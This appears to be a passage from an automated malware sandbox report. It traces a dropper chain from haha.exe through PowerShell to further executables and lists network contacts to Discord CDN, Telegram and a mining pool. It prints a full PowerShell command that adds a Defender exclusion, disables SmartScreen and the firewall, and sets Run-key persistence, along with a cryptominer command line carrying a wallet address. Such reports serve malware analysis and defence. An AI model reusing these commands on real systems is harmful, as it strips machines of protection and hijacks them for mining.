Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\Systemd\procexp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2136 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\haha.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\haha.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\haha.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1172 wrote to memory of 2284 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\79571.exe
PID 1172 wrote to memory of 2284 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\79571.exe
PID 1172 wrote to memory of 2284 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\79571.exe
PID 2284 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
PID 2284 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
PID 2284 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
PID 2284 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\DllHost.exe
PID 2284 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\DllHost.exe
PID 1444 wrote to memory of 33560 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1444 wrote to memory of 33560 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 33560 wrote to memory of 67976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe
PID 33560 wrote to memory of 67976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe
PID 1444 wrote to memory of 69608 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\ProgramData\Systemd\procexp.exe
PID 1444 wrote to memory of 69608 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\ProgramData\Systemd\procexp.exe
PID 33560 wrote to memory of 85036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 33560 wrote to memory of 85036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 92304 wrote to memory of 94360 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe
PID 92304 wrote to memory of 94360 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe
PID 92304 wrote to memory of 94992 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe
PID 92304 wrote to memory of 94992 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe
PID 94992 wrote to memory of 94460 N/A C:\ProgramData\UpSys.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 94992 wrote to memory of 94460 N/A C:\ProgramData\UpSys.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\haha.exe

"C:\Users\Admin\AppData\Local\Temp\haha.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -F C:\Users\Admin\AppData\Local\Temp\79571.ps1

C:\Users\Admin\AppData\Local\Temp\79571.exe

"C:\Users\Admin\AppData\Local\Temp\79571.exe"

C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

"C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe"

C:\Users\Admin\AppData\Local\Temp\DllHost.exe

"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe

C:\ProgramData\Systemd\procexp.exe

--url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Network

Country Destination Domain Proto
US 20.189.173.2:443 tcp
NL 104.110.191.133:80 tcp
NL 104.110.191.133:80 tcp
NL 104.110.191.133:80 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
N/A 127.0.0.1:49754 tcp
N/A 127.0.0.1:49759 tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 3.220.57.224:443 api.ipify.org tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.32.68:80 crl.usertrust.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 13.107.21.200:443 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 142.132.131.248:80 pool.hashvault.pro tcp

Files
